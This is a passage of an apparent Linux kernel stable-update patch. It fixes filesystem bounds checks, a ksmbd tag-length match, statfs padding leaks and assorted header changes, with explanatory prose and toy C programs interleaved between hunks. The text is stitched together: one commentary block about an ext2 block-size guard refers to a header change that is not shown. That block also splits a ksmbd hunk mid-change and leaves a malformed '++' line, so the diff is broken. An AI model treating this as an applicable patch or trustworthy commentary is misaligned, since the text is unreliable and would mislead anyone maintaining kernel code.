++	 */
++	if (free_sections(sbi) <= upper_secs + NR_GC_CHECKPOINT_SECS &&
+ 				prefree_segments(sbi)) {
+ 		ret = f2fs_write_checkpoint(sbi, &cpc);
+ 		if (ret)
+diff --git a/fs/f2fs/gc.h b/fs/f2fs/gc.h
+index ca84024b9c9e7..47357101b03cd 100644
+--- a/fs/f2fs/gc.h
++++ b/fs/f2fs/gc.h
+@@ -30,6 +30,8 @@
+ /* Search max. number of dirty segments to select a victim segment */
+ #define DEF_MAX_VICTIM_SEARCH 4096 /* covers 8GB */
+ 
++#define NR_GC_CHECKPOINT_SECS (3)	/* data/node/dentry sections */
++
+ struct f2fs_gc_kthread {
+ 	struct task_struct *f2fs_gc_task;
+ 	wait_queue_head_t gc_wait_queue_head;
+diff --git a/fs/f2fs/segment.h b/fs/f2fs/segment.h
+index cd65778fc9822..f3951e8ad3948 100644
+--- a/fs/f2fs/segment.h
++++ b/fs/f2fs/segment.h
+@@ -608,8 +608,12 @@ static inline bool has_curseg_enough_space(struct f2fs_sb_info *sbi,
+ 	return true;
+ }
+ 
+-static inline bool has_not_enough_free_secs(struct f2fs_sb_info *sbi,
+-					int freed, int needed)
++/*
++ * calculate needed sections for dirty node/dentry
++ * and call has_curseg_enough_space
++ */
++static inline void __get_secs_required(struct f2fs_sb_info *sbi,
++		unsigned int *lower_p, unsigned int *upper_p, bool *curseg_p)
+ {
+ 	unsigned int total_node_blocks = get_pages(sbi, F2FS_DIRTY_NODES) +
+ 					get_pages(sbi, F2FS_DIRTY_DENTS) +
+@@ -619,20 +623,37 @@ static inline bool has_not_enough_free_secs(struct f2fs_sb_info *sbi,
+ 	unsigned int dent_secs = total_dent_blocks / CAP_BLKS_PER_SEC(sbi);
+ 	unsigned int node_blocks = total_node_blocks % CAP_BLKS_PER_SEC(sbi);
+ 	unsigned int dent_blocks = total_dent_blocks % CAP_BLKS_PER_SEC(sbi);
+-	unsigned int free, need_lower, need_upper;
++
++	if (lower_p)
++		*lower_p = node_secs + dent_secs;
++	if (upper_p)
++		*upper_p = node_secs + dent_secs +
++			(node_blocks ? 1 : 0) + (dent_blocks ? 1 : 0);
++	if (curseg_p)
++		*curseg_p = has_curseg_enough_space(sbi,
++				node_blocks, dent_blocks);
++}
++
++static inline bool has_not_enough_free_secs(struct f2fs_sb_info *sbi,
++					int freed, int needed)
++{
++	unsigned int free_secs, lower_secs, upper_secs;
++	bool curseg_space;
+ 
+ 	if (unlikely(is_sbi_flag_set(sbi, SBI_POR_DOING)))
+ 		return false;
+ 
+-	free = free_sections(sbi) + freed;
+-	need_lower = node_secs + dent_secs + reserved_sections(sbi) + needed;
+-	need_upper = need_lower + (node_blocks ? 1 : 0) + (dent_blocks ? 1 : 0);
++	__get_secs_required(sbi, &lower_secs, &upper_secs, &curseg_space);
++
++	free_secs = free_sections(sbi) + freed;
++	lower_secs += needed + reserved_sections(sbi);
++	upper_secs += needed + reserved_sections(sbi);
+ 
+-	if (free > need_upper)
++	if (free_secs > upper_secs)
+ 		return false;
+-	else if (free <= need_lower)
++	else if (free_secs <= lower_secs)
+ 		return true;
+-	return !has_curseg_enough_space(sbi, node_blocks, dent_blocks);
++	return !curseg_space;
+ }
+ 
+ static inline bool f2fs_is_checkpoint_ready(struct f2fs_sb_info *sbi)
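
The lower/upper split that __get_secs_required() introduces is plain
integer division plus a one-section round-up per partial section. A toy
calculation with made-up numbers:

	#include <stdio.h>

	int main(void)
	{
		unsigned int cap_blks_per_sec = 512;
		unsigned int total_node_blocks = 1030;	/* 2 full secs + 6 blocks */
		unsigned int total_dent_blocks = 512;	/* exactly 1 full sec */

		unsigned int node_secs = total_node_blocks / cap_blks_per_sec;
		unsigned int dent_secs = total_dent_blocks / cap_blks_per_sec;
		unsigned int node_blocks = total_node_blocks % cap_blks_per_sec;
		unsigned int dent_blocks = total_dent_blocks % cap_blks_per_sec;

		unsigned int lower = node_secs + dent_secs;
		unsigned int upper = lower +
			(node_blocks ? 1 : 0) + (dent_blocks ? 1 : 0);

		/* lower=3 upper=4: free space between the two bounds is the
		 * case that falls through to has_curseg_enough_space() */
		printf("lower=%u upper=%u\n", lower, upper);
		return 0;
	}
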
+diff --git a/fs/f2fs/super.c b/fs/f2fs/super.c
+index c46533d65372c..b6dad389fa144 100644
+--- a/fs/f2fs/super.c
++++ b/fs/f2fs/super.c
+@@ -2258,7 +2258,7 @@ static int f2fs_remount(struct super_block *sb, int *flags, char *data)
+ 	if (f2fs_readonly(sb) && (*flags & SB_RDONLY))
+ 		goto skip;
+ 
+-	if (f2fs_sb_has_readonly(sbi) && !(*flags & SB_RDONLY)) {
++	if (f2fs_dev_is_readonly(sbi) && !(*flags & SB_RDONLY)) {
+ 		err = -EROFS;
+ 		goto restore_opts;
+ 	}
+diff --git a/fs/gfs2/glops.c b/fs/gfs2/glops.c
+index d78b61ecc1cdf..7762483f5f20f 100644
+--- a/fs/gfs2/glops.c
++++ b/fs/gfs2/glops.c
+@@ -393,6 +393,7 @@ static int inode_go_demote_ok(const struct gfs2_glock *gl)
+ 
+ static int gfs2_dinode_in(struct gfs2_inode *ip, const void *buf)
+ {
++	struct gfs2_sbd *sdp = GFS2_SB(&ip->i_inode);
+ 	const struct gfs2_dinode *str = buf;
+ 	struct timespec64 atime;
+ 	u16 height, depth;
+@@ -439,7 +440,7 @@ static int gfs2_dinode_in(struct gfs2_inode *ip, const void *buf)
+ 	/* i_diskflags and i_eattr must be set before gfs2_set_inode_flags() */
+ 	gfs2_set_inode_flags(inode);
+ 	height = be16_to_cpu(str->di_height);
+-	if (unlikely(height > GFS2_MAX_META_HEIGHT))
++	if (unlikely(height > sdp->sd_max_height))
+ 		goto corrupt;
+ 	ip->i_height = (u8)height;
+ 
+diff --git a/fs/hfsplus/inode.c b/fs/hfsplus/inode.c
+index b675581aa9d0f..399a6354f0cc5 100644
+--- a/fs/hfsplus/inode.c
++++ b/fs/hfsplus/inode.c
+@@ -511,7 +511,11 @@ int hfsplus_cat_read_inode(struct inode *inode, struct hfs_find_data *fd)
+ 	if (type == HFSPLUS_FOLDER) {
+ 		struct hfsplus_cat_folder *folder = &entry.folder;
+ 
+-		WARN_ON(fd->entrylength < sizeof(struct hfsplus_cat_folder));
++		if (fd->entrylength < sizeof(struct hfsplus_cat_folder)) {
++			pr_err("bad catalog folder entry\n");
++			res = -EIO;
++			goto out;
++		}
+ 		hfs_bnode_read(fd->bnode, &entry, fd->entryoffset,
+ 					sizeof(struct hfsplus_cat_folder));
+ 		hfsplus_get_perms(inode, &folder->permissions, 1);
+@@ -531,7 +535,11 @@ int hfsplus_cat_read_inode(struct inode *inode, struct hfs_find_data *fd)
+ 	} else if (type == HFSPLUS_FILE) {
+ 		struct hfsplus_cat_file *file = &entry.file;
+ 
+-		WARN_ON(fd->entrylength < sizeof(struct hfsplus_cat_file));
++		if (fd->entrylength < sizeof(struct hfsplus_cat_file)) {
++			pr_err("bad catalog file entry\n");
++			res = -EIO;
++			goto out;
++		}
+ 		hfs_bnode_read(fd->bnode, &entry, fd->entryoffset,
+ 					sizeof(struct hfsplus_cat_file));
+ 
+@@ -562,6 +570,7 @@ int hfsplus_cat_read_inode(struct inode *inode, struct hfs_find_data *fd)
+ 		pr_err("bad catalog entry used to create inode\n");
+ 		res = -EIO;
+ 	}
++out:
+ 	return res;
+ }
+ 
+@@ -570,6 +579,7 @@ int hfsplus_cat_write_inode(struct inode *inode)
+ 	struct inode *main_inode = inode;
+ 	struct hfs_find_data fd;
+ 	hfsplus_cat_entry entry;
++	int res = 0;
+ 
+ 	if (HFSPLUS_IS_RSRC(inode))
+ 		main_inode = HFSPLUS_I(inode)->rsrc_inode;
+@@ -588,7 +598,11 @@ int hfsplus_cat_write_inode(struct inode *inode)
+ 	if (S_ISDIR(main_inode->i_mode)) {
+ 		struct hfsplus_cat_folder *folder = &entry.folder;
+ 
+-		WARN_ON(fd.entrylength < sizeof(struct hfsplus_cat_folder));
++		if (fd.entrylength < sizeof(struct hfsplus_cat_folder)) {
++			pr_err("bad catalog folder entry\n");
++			res = -EIO;
++			goto out;
++		}
+ 		hfs_bnode_read(fd.bnode, &entry, fd.entryoffset,
+ 					sizeof(struct hfsplus_cat_folder));
+ 		/* simple node checks? */
+@@ -613,7 +627,11 @@ int hfsplus_cat_write_inode(struct inode *inode)
+ 	} else {
+ 		struct hfsplus_cat_file *file = &entry.file;
+ 
+-		WARN_ON(fd.entrylength < sizeof(struct hfsplus_cat_file));
++		if (fd.entrylength < sizeof(struct hfsplus_cat_file)) {
++			pr_err("bad catalog file entry\n");
++			res = -EIO;
++			goto out;
++		}
+ 		hfs_bnode_read(fd.bnode, &entry, fd.entryoffset,
+ 					sizeof(struct hfsplus_cat_file));
+ 		hfsplus_inode_write_fork(inode, &file->data_fork);
+@@ -634,7 +652,7 @@ int hfsplus_cat_write_inode(struct inode *inode)
+ 	set_bit(HFSPLUS_I_CAT_DIRTY, &HFSPLUS_I(inode)->flags);
+ out:
+ 	hfs_find_exit(&fd);
+-	return 0;
++	return res;
+ }
+ 
+ int hfsplus_fileattr_get(struct dentry *dentry, struct fileattr *fa)
+diff --git a/fs/ksmbd/connection.c b/fs/ksmbd/connection.c
+index e3312fbf4c090..b371754540f9c 100644
+--- a/fs/ksmbd/connection.c
++++ b/fs/ksmbd/connection.c
+@@ -353,7 +353,8 @@ int ksmbd_conn_handler_loop(void *p)
+ 			break;
+ 
+ 		/* 4 for rfc1002 length field */
+-		size = pdu_size + 4;
++		/* 1 for implied bcc[0] */
++		size = pdu_size + 4 + 1;
+ 		conn->request_buf = kvmalloc(size, GFP_KERNEL);
+ 		if (!conn->request_buf)
+ 			break;
+diff --git a/fs/ksmbd/oplock.c b/fs/ksmbd/oplock.c
+index d7d47b82451db..c7466546e59be 100644
+--- a/fs/ksmbd/oplock.c
++++ b/fs/ksmbd/oplock.c
+@@ -1449,11 +1449,12 @@ struct lease_ctx_info *parse_lease_state(void *open_req)
+  * smb2_find_context_vals() - find a particular context info in open request
+  * @open_req:	buffer containing smb2 file open(create) request
+  * @tag:	context name to search for
++ * @tag_len:	the length of tag
+  *
+  * Return:	pointer to requested context, NULL if @str context not found
+  *		or error pointer if name length is invalid.
+  */
+-struct create_context *smb2_find_context_vals(void *open_req, const char *tag)
++struct create_context *smb2_find_context_vals(void *open_req, const char *tag, int tag_len)
+ {
+ 	struct create_context *cc;
+ 	unsigned int next = 0;
+@@ -1492,7 +1493,7 @@ struct create_context *smb2_find_context_vals(void *open_req, const char *tag)
+ 			return ERR_PTR(-EINVAL);
+ 
+ 		name = (char *)cc + name_off;
+-		if (memcmp(name, tag, name_len) == 0)
++		if (name_len == tag_len && !memcmp(name, tag, name_len))
+ 			return cc;
+ 
+ 		remain_len -= next;
+diff --git a/fs/ksmbd/oplock.h b/fs/ksmbd/oplock.h
+index 09753448f7798..4b0fe6da76940 100644
+--- a/fs/ksmbd/oplock.h
++++ b/fs/ksmbd/oplock.h
+@@ -118,7 +118,7 @@ void create_durable_v2_rsp_buf(char *cc, struct ksmbd_file *fp);
+ void create_mxac_rsp_buf(char *cc, int maximal_access);
+ void create_disk_id_rsp_buf(char *cc, __u64 file_id, __u64 vol_id);
+ void create_posix_rsp_buf(char *cc, struct ksmbd_file *fp);
+-struct create_context *smb2_find_context_vals(void *open_req, const char *str);
++struct create_context *smb2_find_context_vals(void *open_req, const char *tag, int tag_len);
+ struct oplock_info *lookup_lease_in_table(struct ksmbd_conn *conn,
+ 					  char *lease_key);
+ int find_same_lease_key(struct ksmbd_session *sess, struct ksmbd_inode *ci,
+diff --git a/fs/ksmbd/smb2misc.c b/fs/ksmbd/smb2misc.c
+index fbdde426dd01d..0ffe663b75906 100644
+--- a/fs/ksmbd/smb2misc.c
++++ b/fs/ksmbd/smb2misc.c
+@@ -416,8 +416,11 @@ int ksmbd_smb2_check_message(struct ksmbd_work *work)
+ 
+ 		/*
+ 		 * Allow a message that padded to 8byte boundary.
++		 * Linux 4.19.217 with smb 3.0.2 sometimes sends
++		 * messages where the clc_len is exactly
++		 * 8 bytes less than len.
+ 		 */
+-		if (clc_len < len && (len - clc_len) < 8)
++		if (clc_len < len && (len - clc_len) <= 8)
+ 			goto validate_credit;
+ 
+ 		pr_err_ratelimited(
+diff --git a/fs/ksmbd/smb2pdu.c b/fs/ksmbd/smb2pdu.c
+index 8f96b96dbac1a..7684b31035d93 100644
+--- a/fs/ksmbd/smb2pdu.c
++++ b/fs/ksmbd/smb2pdu.c
+@@ -1373,7 +1373,7 @@ static struct ksmbd_user *session_user(struct ksmbd_conn *conn,
+ 	struct authenticate_message *authblob;
+ 	struct ksmbd_user *user;
+ 	char *name;
+-	unsigned int auth_msg_len, name_off, name_len, secbuf_len;
++	unsigned int name_off, name_len, secbuf_len;
+ 
+ 	secbuf_len = le16_to_cpu(req->SecurityBufferLength);
+ 	if (secbuf_len < sizeof(struct authenticate_message)) {
+@@ -1383,9 +1383,8 @@ static struct ksmbd_user *session_user(struct ksmbd_conn *conn,
+ 	authblob = user_authblob(conn, req);
+ 	name_off = le32_to_cpu(authblob->UserName.BufferOffset);
+ 	name_len = le16_to_cpu(authblob->UserName.Length);
+-	auth_msg_len = le16_to_cpu(req->SecurityBufferOffset) + secbuf_len;
+ 
+-	if (auth_msg_len < (u64)name_off + name_len)
++	if (secbuf_len < (u64)name_off + name_len)
+ 		return NULL;
+ 
+ 	name = smb_strndup_from_utf16((const char *)authblob + name_off,
+@@ -2479,7 +2478,7 @@ static int smb2_create_sd_buffer(struct ksmbd_work *work,
+ 		return -ENOENT;
+ 
+ 	/* Parse SD BUFFER create contexts */
+-	context = smb2_find_context_vals(req, SMB2_CREATE_SD_BUFFER);
++	context = smb2_find_context_vals(req, SMB2_CREATE_SD_BUFFER, 4);
+ 	if (!context)
+ 		return -ENOENT;
+ 	else if (IS_ERR(context))
+@@ -2681,7 +2680,7 @@ int smb2_open(struct ksmbd_work *work)
+ 
+ 	if (req->CreateContextsOffset) {
+ 		/* Parse non-durable handle create contexts */
+-		context = smb2_find_context_vals(req, SMB2_CREATE_EA_BUFFER);
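
For context on the new bound: without it, a crafted superblock value
drives the shift below past any sane block size. A minimal userspace
sketch of the guard (constants copied from the header change above):

	#include <stdint.h>
	#include <stdio.h>

	#define BLOCK_SIZE_BITS		10
	#define BLOCK_SIZE		(1 << BLOCK_SIZE_BITS)
	#define EXT2_MAX_BLOCK_LOG_SIZE	16

	/* Mirrors the new ext2_fill_super() check: reject any log size
	 * that would push the block size past 2^16 bytes. */
	static long checked_blocksize(uint32_t s_log_block_size)
	{
		if (s_log_block_size > (EXT2_MAX_BLOCK_LOG_SIZE - BLOCK_SIZE_BITS))
			return -1;
		return (long)BLOCK_SIZE << s_log_block_size;
	}

	int main(void)
	{
		printf("%ld\n", checked_blocksize(2));	/* 4096 */
		printf("%ld\n", checked_blocksize(42));	/* -1: rejected */
		return 0;
	}
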
++		context = smb2_find_context_vals(req, SMB2_CREATE_EA_BUFFER, 4);
+ 		if (IS_ERR(context)) {
+ 			rc = PTR_ERR(context);
+ 			goto err_out1;
+@@ -2701,7 +2700,7 @@ int smb2_open(struct ksmbd_work *work)
+ 		}
+ 
+ 		context = smb2_find_context_vals(req,
+-						 SMB2_CREATE_QUERY_MAXIMAL_ACCESS_REQUEST);
++						 SMB2_CREATE_QUERY_MAXIMAL_ACCESS_REQUEST, 4);
+ 		if (IS_ERR(context)) {
+ 			rc = PTR_ERR(context);
+ 			goto err_out1;
+@@ -2712,7 +2711,7 @@ int smb2_open(struct ksmbd_work *work)
+ 		}
+ 
+ 		context = smb2_find_context_vals(req,
+-						 SMB2_CREATE_TIMEWARP_REQUEST);
++						 SMB2_CREATE_TIMEWARP_REQUEST, 4);
+ 		if (IS_ERR(context)) {
+ 			rc = PTR_ERR(context);
+ 			goto err_out1;
+@@ -2724,7 +2723,7 @@ int smb2_open(struct ksmbd_work *work)
+ 
+ 		if (tcon->posix_extensions) {
+ 			context = smb2_find_context_vals(req,
+-							 SMB2_CREATE_TAG_POSIX);
++							 SMB2_CREATE_TAG_POSIX, 16);
+ 			if (IS_ERR(context)) {
+ 				rc = PTR_ERR(context);
+ 				goto err_out1;
+@@ -3123,7 +3122,7 @@ int smb2_open(struct ksmbd_work *work)
+ 		struct create_alloc_size_req *az_req;
+ 
+ 		az_req = (struct create_alloc_size_req *)smb2_find_context_vals(req,
+-					SMB2_CREATE_ALLOCATION_SIZE);
++					SMB2_CREATE_ALLOCATION_SIZE, 4);
+ 		if (IS_ERR(az_req)) {
+ 			rc = PTR_ERR(az_req);
+ 			goto err_out;
+@@ -3150,7 +3149,7 @@ int smb2_open(struct ksmbd_work *work)
+ 					    err);
+ 		}
+ 
+-		context = smb2_find_context_vals(req, SMB2_CREATE_QUERY_ON_DISK_ID);
++		context = smb2_find_context_vals(req, SMB2_CREATE_QUERY_ON_DISK_ID, 4);
+ 		if (IS_ERR(context)) {
+ 			rc = PTR_ERR(context);
+ 			goto err_out;
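
The extra tag_len argument matters because the old comparison used the
client-controlled name_len for memcmp(), so a short name could "match"
a prefix of a longer tag. A toy illustration (stand-in strings, not the
real create-context tags):

	#include <stdio.h>
	#include <string.h>

	static int old_match(const char *name, size_t name_len, const char *tag)
	{
		return memcmp(name, tag, name_len) == 0;	/* prefix match! */
	}

	static int new_match(const char *name, size_t name_len,
			     const char *tag, size_t tag_len)
	{
		return name_len == tag_len && memcmp(name, tag, name_len) == 0;
	}

	int main(void)
	{
		const char *tag = "SecD";	/* stand-in for a 4-byte tag */

		printf("old: %d\n", old_match("Se", 2, tag));		/* 1: bogus */
		printf("new: %d\n", new_match("Se", 2, tag, 4));	/* 0 */
		printf("new: %d\n", new_match("SecD", 4, tag, 4));	/* 1 */
		return 0;
	}
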
+diff --git a/fs/nilfs2/inode.c b/fs/nilfs2/inode.c
+index 232dd7b6cca14..f6e44efb58e15 100644
+--- a/fs/nilfs2/inode.c
++++ b/fs/nilfs2/inode.c
+@@ -917,6 +917,7 @@ void nilfs_evict_inode(struct inode *inode)
+ 	struct nilfs_transaction_info ti;
+ 	struct super_block *sb = inode->i_sb;
+ 	struct nilfs_inode_info *ii = NILFS_I(inode);
++	struct the_nilfs *nilfs;
+ 	int ret;
+ 
+ 	if (inode->i_nlink || !ii->i_root || unlikely(is_bad_inode(inode))) {
+@@ -929,6 +930,23 @@ void nilfs_evict_inode(struct inode *inode)
+ 
+ 	truncate_inode_pages_final(&inode->i_data);
+ 
++	nilfs = sb->s_fs_info;
++	if (unlikely(sb_rdonly(sb) || !nilfs->ns_writer)) {
++		/*
++		 * If this inode is about to be disposed after the file system
++		 * has been degraded to read-only due to file system corruption
++		 * or after the writer has been detached, do not make any
++		 * changes that cause writes, just clear it.
++		 * Do this check after read-locking ns_segctor_sem by
++		 * nilfs_transaction_begin() in order to avoid a race with
++		 * the writer detach operation.
++		 */
++		clear_inode(inode);
++		nilfs_clear_inode(inode);
++		nilfs_transaction_abort(sb);
++		return;
++	}
++
+ 	/* TODO: some of the following operations may fail.  */
+ 	nilfs_truncate_bmap(ii, 0);
+ 	nilfs_mark_inode_dirty(inode);
+diff --git a/fs/open.c b/fs/open.c
+index 20717ec510c07..9541430ec5b30 100644
+--- a/fs/open.c
++++ b/fs/open.c
+@@ -1158,13 +1158,21 @@ inline int build_open_flags(const struct open_how *how, struct open_flags *op)
+ 	}
+ 
+ 	/*
+-	 * In order to ensure programs get explicit errors when trying to use
+-	 * O_TMPFILE on old kernels, O_TMPFILE is implemented such that it
+-	 * looks like (O_DIRECTORY|O_RDWR & ~O_CREAT) to old kernels. But we
+-	 * have to require userspace to explicitly set it.
++	 * Block bugs where O_DIRECTORY | O_CREAT created regular files.
++	 * Note that blocking O_DIRECTORY | O_CREAT here also protects
++	 * O_TMPFILE below which requires O_DIRECTORY being raised.
+ 	 */
++	if ((flags & (O_DIRECTORY | O_CREAT)) == (O_DIRECTORY | O_CREAT))
++		return -EINVAL;
++
++	/* Now handle the creative implementation of O_TMPFILE. */
+ 	if (flags & __O_TMPFILE) {
+-		if ((flags & O_TMPFILE_MASK) != O_TMPFILE)
++		/*
++		 * In order to ensure programs get explicit errors when trying
++		 * to use O_TMPFILE on old kernels we enforce that O_DIRECTORY
++		 * is raised alongside __O_TMPFILE.
++		 */
++		if (!(flags & O_DIRECTORY))
+ 			return -EINVAL;
+ 		if (!(acc_mode & MAY_WRITE))
+ 			return -EINVAL;
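
From userspace nothing changes for well-formed callers: the O_TMPFILE
macro already includes O_DIRECTORY, so only hand-rolled flag combinations
hit the new -EINVAL. A minimal example of the supported pattern:

	#define _GNU_SOURCE
	#include <fcntl.h>
	#include <stdio.h>
	#include <unistd.h>

	int main(void)
	{
		/* O_TMPFILE expands to __O_TMPFILE | O_DIRECTORY; passing
		 * __O_TMPFILE alone, or O_DIRECTORY | O_CREAT, now fails
		 * with EINVAL instead of creating a regular file. */
		int fd = open("/tmp", O_TMPFILE | O_RDWR, 0600);

		if (fd < 0) {
			perror("open(O_TMPFILE)");
			return 1;
		}
		(void)write(fd, "scratch\n", 8);	/* unnamed, gone on close */
		close(fd);
		return 0;
	}
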
+diff --git a/fs/statfs.c b/fs/statfs.c
+index 0ba34c1355932..96d1c3edf289c 100644
+--- a/fs/statfs.c
++++ b/fs/statfs.c
+@@ -130,6 +130,7 @@ static int do_statfs_native(struct kstatfs *st, struct statfs __user *p)
+ 	if (sizeof(buf) == sizeof(*st))
+ 		memcpy(&buf, st, sizeof(*st));
+ 	else {
++		memset(&buf, 0, sizeof(buf));
+ 		if (sizeof buf.f_blocks == 4) {
+ 			if ((st->f_blocks | st->f_bfree | st->f_bavail |
+ 			     st->f_bsize | st->f_frsize) &
+@@ -158,7 +159,6 @@ static int do_statfs_native(struct kstatfs *st, struct statfs __user *p)
+ 		buf.f_namelen = st->f_namelen;
+ 		buf.f_frsize = st->f_frsize;
+ 		buf.f_flags = st->f_flags;
+-		memset(buf.f_spare, 0, sizeof(buf.f_spare));
+ 	}
+ 	if (copy_to_user(p, &buf, sizeof(buf)))
+ 		return -EFAULT;
+@@ -171,6 +171,7 @@ static int do_statfs64(struct kstatfs *st, struct statfs64 __user *p)
+ 	if (sizeof(buf) == sizeof(*st))
+ 		memcpy(&buf, st, sizeof(*st));
+ 	else {
++		memset(&buf, 0, sizeof(buf));
+ 		buf.f_type = st->f_type;
+ 		buf.f_bsize = st->f_bsize;
+ 		buf.f_blocks = st->f_blocks;
+@@ -182,7 +183,6 @@ static int do_statfs64(struct kstatfs *st, struct statfs64 __user *p)
+ 		buf.f_namelen = st->f_namelen;
+ 		buf.f_frsize = st->f_frsize;
+ 		buf.f_flags = st->f_flags;
+-		memset(buf.f_spare, 0, sizeof(buf.f_spare));
+ 	}
+ 	if (copy_to_user(p, &buf, sizeof(buf)))
+ 		return -EFAULT;
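
Zeroing the whole output struct up front (instead of only f_spare at the
end) is the standard infoleak fix: implicit padding between members was
previously copied to userspace uninitialized. The pattern in isolation,
with a simplified stand-in struct:

	#include <stdio.h>
	#include <string.h>

	struct out_buf {
		short f_type;		/* 2 bytes, then padding ... */
		long f_bsize;		/* ... before this member */
		long f_spare[4];
	};

	static void fill_out(struct out_buf *out, short type, long bsize)
	{
		memset(out, 0, sizeof(*out));	/* covers padding and f_spare */
		out->f_type = type;
		out->f_bsize = bsize;
	}

	int main(void)
	{
		struct out_buf b;

		fill_out(&b, 1, 4096);
		printf("%d %ld\n", b.f_type, b.f_bsize);
		return 0;
	}
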
+diff --git a/include/linux/arm-smccc.h b/include/linux/arm-smccc.h
+index 220c8c60e021a..f196c19f8e55c 100644
+--- a/include/linux/arm-smccc.h
++++ b/include/linux/arm-smccc.h
+@@ -226,6 +226,24 @@ void __init arm_smccc_version_init(u32 version, enum arm_smccc_conduit conduit);
+ 
+ extern u64 smccc_has_sve_hint;
+ 
++/**
++ * arm_smccc_get_soc_id_version()
++ *
++ * Returns the SOC ID version.
++ *
++ * When ARM_SMCCC_ARCH_SOC_ID is not present, returns SMCCC_RET_NOT_SUPPORTED.
++ */
++s32 arm_smccc_get_soc_id_version(void);
++
++/**
++ * arm_smccc_get_soc_id_revision()
++ *
++ * Returns the SOC ID revision.
++ *
++ * When ARM_SMCCC_ARCH_SOC_ID is not present, returns SMCCC_RET_NOT_SUPPORTED.
++ */
++s32 arm_smccc_get_soc_id_revision(void);
++
+ /**
+  * struct arm_smccc_res - Result from SMC/HVC call
+  * @a0-a3 result values from registers 0 to 3
+diff --git a/include/linux/cpuhotplug.h b/include/linux/cpuhotplug.h
+index f61447913db97..2be2091c2b447 100644
+--- a/include/linux/cpuhotplug.h
++++ b/include/linux/cpuhotplug.h
+@@ -161,7 +161,6 @@ enum cpuhp_state {
+ 	CPUHP_AP_PERF_X86_CSTATE_STARTING,
+ 	CPUHP_AP_PERF_XTENSA_STARTING,
+ 	CPUHP_AP_MIPS_OP_LOONGSON3_STARTING,
+-	CPUHP_AP_ARM_SDEI_STARTING,
+ 	CPUHP_AP_ARM_VFP_STARTING,
+ 	CPUHP_AP_ARM64_DEBUG_MONITORS_STARTING,
+ 	CPUHP_AP_PERF_ARM_HW_BREAKPOINT_STARTING,
+diff --git a/include/linux/dim.h b/include/linux/dim.h
+index 6c5733981563e..f343bc9aa2ec9 100644
+--- a/include/linux/dim.h
++++ b/include/linux/dim.h
+@@ -236,8 +236,9 @@ void dim_park_tired(struct dim *dim);
+  *
+  * Calculate the delta between two samples (in data rates).
+  * Takes into consideration counter wrap-around.
++ * Returned boolean indicates whether curr_stats are reliable.
+  */
+-void dim_calc_stats(struct dim_sample *start, struct dim_sample *end,
++bool dim_calc_stats(struct dim_sample *start, struct dim_sample *end,
+ 		    struct dim_stats *curr_stats);
+ 
+ /**
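
A caller sketch for the new signature, roughly how net_dim() consumes it
inside its state switch (fragment only, kernel context assumed):

	struct dim_stats curr_stats;

	/* Skip the tuning step when the delta was unreliable, e.g. after
	 * a counter wrap-around between the two samples. */
	if (!dim_calc_stats(&dim->start_sample, &end_sample, &curr_stats))
		break;
	/* ... feed curr_stats into the moderation decision as before ... */
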
+diff --git a/include/linux/if_vlan.h b/include/linux/if_vlan.h
+index e00c4ee81ff7f..68b1c41332984 100644
+--- a/include/linux/if_vlan.h
++++ b/include/linux/if_vlan.h
+@@ -631,6 +631,23 @@ static inline __be16 vlan_get_protocol(const struct sk_buff *skb)
+ 	return __vlan_get_protocol(skb, skb->protocol, NULL);
+ }
+ 
++/* This version of __vlan_get_protocol() also pulls mac header in skb->head */
++static inline __be16 vlan_get_protocol_and_depth(struct sk_buff *skb,
++						 __be16 type, int *depth)
++{
++	int maclen;
++
++	type = __vlan_get_protocol(skb, type, &maclen);
++
++	if (type) {
++		if (!pskb_may_pull(skb, maclen))
++			type = 0;
++		else if (depth)
++			*depth = maclen;
++	}
++	return type;
++}
++
+ /* A getter for the SKB protocol field which will handle VLAN tags consistently
+  * whether VLAN acceleration is enabled or not.
+  */
+diff --git a/include/linux/netdevice.h b/include/linux/netdevice.h
+index b072449b0f1ac..eac51e22a52a8 100644
+--- a/include/linux/netdevice.h
++++ b/include/linux/netdevice.h
+@@ -2428,6 +2428,7 @@ static inline
+ struct netdev_queue *netdev_get_tx_queue(const struct net_device *dev,
+ 					 unsigned int index)
+ {
++	DEBUG_NET_WARN_ON_ONCE(index >= dev->num_tx_queues);
+ 	return &dev->_tx[index];
+ }
+ 
+diff --git a/include/linux/platform_device.h b/include/linux/platform_device.h
+index b0d5a253156ec..b845fd83f429b 100644
+--- a/include/linux/platform_device.h
++++ b/include/linux/platform_device.h
+@@ -207,7 +207,18 @@ extern void platform_device_put(struct platform_device *pdev);
+ 
+ struct platform_driver {
+ 	int (*probe)(struct platform_device *);
++
++	/*
++	 * Traditionally the remove callback returned an int which however is
++	 * ignored by the driver core. This led to wrong expectations by driver
++	 * authors who thought returning an error code was a valid error
++	 * handling strategy. To convert to a callback returning void, new
++	 * drivers should implement .remove_new() until the conversion is
++	 * done and .remove() itself is changed to return void.
++	 */
+ 	int (*remove)(struct platform_device *);
++	void (*remove_new)(struct platform_device *);
++
+ 	void (*shutdown)(struct platform_device *);
+ 	int (*suspend)(struct platform_device *, pm_message_t state);
+ 	int (*resume)(struct platform_device *);
+diff --git a/include/linux/sched/task_stack.h b/include/linux/sched/task_stack.h
+index 5e799a47431e8..f158b025c1750 100644
+--- a/include/linux/sched/task_stack.h
++++ b/include/linux/sched/task_stack.h
+@@ -23,7 +23,7 @@ static __always_inline void *task_stack_page(const struct task_struct *task)
+ 
+ #define setup_thread_stack(new,old)	do { } while(0)
+ 
+-static inline unsigned long *end_of_stack(const struct task_struct *task)
++static __always_inline unsigned long *end_of_stack(const struct task_struct *task)
+ {
+ #ifdef CONFIG_STACK_GROWSUP
+ 	return (unsigned long *)((unsigned long)task->stack + THREAD_SIZE) - 1;
+diff --git a/include/linux/sunrpc/svc_rdma.h b/include/linux/sunrpc/svc_rdma.h
+index 24aa159d29a7f..fbc4bd423b355 100644
+--- a/include/linux/sunrpc/svc_rdma.h
++++ b/include/linux/sunrpc/svc_rdma.h
+@@ -176,7 +176,7 @@ extern struct svc_rdma_recv_ctxt *
+ extern void svc_rdma_recv_ctxt_put(struct svcxprt_rdma *rdma,
+ 				   struct svc_rdma_recv_ctxt *ctxt);
+ extern void svc_rdma_flush_recv_queues(struct svcxprt_rdma *rdma);
+-extern void svc_rdma_release_rqst(struct svc_rqst *rqstp);
++extern void svc_rdma_release_ctxt(struct svc_xprt *xprt, void *ctxt);
+ extern int svc_rdma_recvfrom(struct svc_rqst *);
+ 
+ /* svc_rdma_rw.c */
+diff --git a/include/linux/sunrpc/svc_xprt.h b/include/linux/sunrpc/svc_xprt.h
+index d42a75b3be102..e882fe16a5008 100644
+--- a/include/linux/sunrpc/svc_xprt.h
